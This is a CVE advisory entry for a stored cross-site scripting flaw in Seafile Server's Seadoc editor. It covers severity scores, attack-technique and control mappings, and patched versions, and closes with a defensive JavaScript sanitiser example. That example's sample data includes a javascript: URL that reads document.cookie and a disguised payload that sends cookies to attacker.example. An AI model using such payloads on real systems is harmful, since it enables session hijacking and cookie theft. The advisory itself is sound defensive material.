CVE-2026-30587

Severity: High · Public PoC referenced

Published: 25 March 2026
Modified: 10 May 2026
KEV Added: not listed in the CISA KEV catalog
Patch: available (13.0.17, 13.0.17-pro, 12.0.20-pro)
CVSS Score v3.1: 8.7 (High) CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
EPSS Score: 0.0028 (19.3rd percentile)
Risk Priority: 55 (floored blend · peak EPSS)

Summary

CVE-2026-30587 is a high-severity stored Cross-site Scripting (CWE-79) vulnerability in Seafile Server. Its CVSS v3.1 base score is 8.7 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE is ranked at the 19.3rd percentile by exploit likelihood (below the median), it is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2026-30587 describes multiple stored cross-site scripting (XSS) vulnerabilities (CWE-79) in Seafile Server versions 13.0.15, 13.0.16-pro, 12.0.14, and prior releases. The issues affect the Seadoc (sdoc) editor component, where the application fails to properly sanitize WebSocket messages related to document structure updates. This enables injection of malicious JavaScript payloads through the src attribute of embedded Excalidraw whiteboards or the href attribute of anchor tags. The vulnerability carries a CVSS v3.1 base score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N) and was published on 2026-03-25.

Authenticated remote attackers with low privileges can exploit these vulnerabilities by crafting a malicious document in the Seadoc editor and sharing it with other users. Exploitation requires user interaction, such as the victim opening or interacting with the affected document, after which the injected payload executes in the victim's browser. The changed scope (S:C) reflects that the payload runs in the victim's browser rather than in the vulnerable server component, so it can act within the victim's authenticated Seafile session: reading or modifying libraries, documents and shares the victim can reach, stealing data, or hijacking the session. This yields the high confidentiality and integrity impacts in the vector; availability is not affected.

Mitigation involves upgrading to the fixed versions: Seafile Server 13.0.17, 13.0.17-pro, or 12.0.20-pro. Relevant patches are detailed in Seadoc editor commit 8fa988aaede072b2ae073d1b2edcb2fc691423b2, Seahub commit 4c5301747bdb84c64b2f2b3230417df2d1cc8987, and changelogs for Seafile Professional Server 12.0 and 13.0. Additional technical details are available in the referenced GitHub Gist.

Vulnerability details

Multiple stored XSS vulnerabilities exist in Seafile Server versions 13.0.15, 13.0.16-pro, 12.0.14 and prior, fixed in 13.0.17, 13.0.17-pro, and 12.0.20-pro, via the Seadoc (sdoc) editor. The application fails to properly sanitize WebSocket messages regarding document structure updates. This allows authenticated remote attackers to inject malicious JavaScript payloads via the src attribute of embedded Excalidraw whiteboards or the href attribute of anchor tags.

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.007 JavaScript (Execution)
Adversaries may abuse various implementations of JavaScript for execution.
T1185 Browser Session Hijacking (Collection)
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user behaviors, and intercept information as part of various browser session hijacking techniques.
T1534 Internal Spearphishing (Lateral Movement)
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization.
T1606.001 Web Cookies (Credential Access)
Adversaries may forge web cookies that can be used to gain access to web applications or Internet services.
Why these techniques?

Stored XSS in the public-facing Seafile web application is reached directly over the network (T1190) by sharing a malicious document with other users (T1534); the attacker-controlled JavaScript executes in the victim's browser (T1059.007), where it can hijack the browser session (T1185) and abuse the victim's web session cookies (T1606.001).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2022-50905 (shared CWE-79)
CVE-2025-27271 (shared CWE-79)
CVE-2025-40587 (shared CWE-79)
CVE-2025-0918 (shared CWE-79)
CVE-2025-69096 (shared CWE-79)
CVE-2025-13761 (shared CWE-79)
CVE-2024-13690 (shared CWE-79)
CVE-2025-68012 (shared CWE-79)
CVE-2025-22766 (shared CWE-79)
CVE-2026-27359 (shared CWE-79)

Affected Assets

Seafile Server (vendor: Seafile)
Affected: 13.0.15, 13.0.16-pro, 12.0.14 and prior
Fixed: 13.0.17, 13.0.17-pro, 12.0.20-pro

Mitigating Controls (NIST 800-53 r5, AI-generated mapping)

Prevent · SI-10 Information Input Validation
Requires validation and sanitization of untrusted WebSocket inputs in the Seadoc editor to block injection of malicious JavaScript payloads via src or href attributes.

Prevent · SI-15 Information Output Filtering
Mandates filtering and encoding of document content on output to prevent execution of stored XSS payloads when victims interact with malicious documents.

Prevent · flaw remediation (control ID not given on the page)
Ensures timely identification, reporting, and patching of the stored XSS flaw, as demonstrated by the fixes in Seafile versions 13.0.17, 13.0.17-pro, and 12.0.20-pro.
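The following is an added example, not code from Seafile or the Seadoc editor, showing what the two controls above look like in practice for the sinks the advisory names (the href of an anchor node and the src of an embedded whiteboard node). The message layout, node type names, field names and the placeholder origin are assumptions made for illustration. Incoming structure-update values are parsed with the WHATWG URL parser before a scheme allowlist is applied, so the same normalisation the browser performs (stripping leading spaces and control characters, removing tabs and newlines, lower-casing the scheme) cannot be used to smuggle a javascript: URL past a naive string check; on the output side, attribute values are HTML-encoded, which shows why encoding alone is not enough for URL-valued attributes.

```javascript
// Added example (not Seafile or Seadoc code). Demonstrates scheme allowlisting of
// untrusted src/href values in a document-structure update received over a
// WebSocket (SI-10) and attribute encoding when the document is rendered (SI-15).
// Message layout, node type names and field names are assumptions.

// Schemes permitted per attribute. Anything else (javascript:, data:, vbscript:,
// blob:, ...) is rejected. Maps rather than plain objects so a node.type such as
// "__proto__" cannot resolve to an inherited property.
const SAFE_SCHEMES = new Map([
  ["href", new Set(["http:", "https:", "mailto:"])],
  ["src", new Set(["http:", "https:"])],
]);

// Node types that carry a URL attribute: the two sinks the advisory names.
const URL_ATTRS = new Map([["link", "href"], ["excalidraw", "src"]]);

// Placeholder origin used only to resolve relative links (assumption).
const PLACEHOLDER_BASE = "https://seafile.example/";

const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Parse with the WHATWG URL parser so the browser's own normalisation happens
// first: leading/trailing spaces and C0 controls are stripped, tab and newline are
// removed anywhere, and the scheme is lower-cased. A prefix check on the raw
// string would miss " \tJavaScript:..." and similar smuggling.
function isSafeUrl(attr, raw) {
  if (typeof raw !== "string" || raw.length > 2048) return false;
  const allowed = SAFE_SCHEMES.get(attr);
  if (!allowed) return false;
  let url;
  try {
    url = new URL(raw, PLACEHOLDER_BASE);
  } catch {
    return false; // unparseable: never let it reach the DOM
  }
  return allowed.has(url.protocol);
}

// Walk the node tree and return a copy with every unsafe src/href removed, plus a
// log of rejections the server can alert on. The input is not mutated.
function sanitizeStructureUpdate(msg) {
  const rejected = [];
  function walk(node, path) {
    if (!node || typeof node !== "object") return node;
    const out = { ...node };
    const attr = URL_ATTRS.get(node.type);
    if (attr && hasOwn(node, attr)) {
      if (!isSafeUrl(attr, node[attr])) {
        rejected.push({ path, attr, value: String(node[attr]) });
        delete out[attr];
      }
    }
    if (Array.isArray(node.children)) {
      out.children = node.children.map((c, i) => walk(c, `${path}.children[${i}]`));
    }
    return out;
  }
  const nodes = Array.isArray(msg.nodes) ? msg.nodes.map((n, i) => walk(n, `nodes[${i}]`)) : [];
  return { message: { ...msg, nodes }, rejected };
}

// Output side. Encoding stops attribute break-out ("><img ...>) but does not stop
// href="javascript:..." (a perfectly valid attribute value), which is why the
// scheme allowlist above is needed in addition to this.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function renderLink(node) {
  const text = (node.children || []).map((c) => escapeHtml(c.text ?? "")).join("");
  return hasOwn(node, "href")
    ? `<a href="${escapeHtml(node.href)}" rel="noopener noreferrer">${text}</a>`
    : `<span>${text}</span>`;
}

// Constructed sample update: two legitimate URLs and two smuggling attempts.
const SAMPLE_MESSAGE = {
  op: "structure_update",
  nodes: [
    { type: "paragraph", children: [
      { type: "link", href: "https://example.org/report", children: [{ text: "report" }] },
      { type: "link", href: "javascript:alert(document.cookie)", children: [{ text: "click me" }] },
    ] },
    { type: "excalidraw", src: " \tJavaScript:fetch('https://attacker.example/?c='+document.cookie)" },
    { type: "excalidraw", src: "/library/whiteboards/design.excalidraw" },
  ],
};

const { message: cleanMessage, rejected: rejectedAttrs } = sanitizeStructureUpdate(SAMPLE_MESSAGE);
console.log("rejected:", rejectedAttrs);
console.log(renderLink(cleanMessage.nodes[0].children[0]));
console.log(renderLink(cleanMessage.nodes[0].children[1]));
```

Running the block logs the two rejected attributes (the javascript: href and the whitespace-and-case-disguised JavaScript: src), renders the legitimate link as an anchor and the stripped one as plain text. The allowlist is deliberately a scheme check only; an embed sink such as a whiteboard src would normally also be restricted to a known origin, which is a separate policy decision not shown here.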
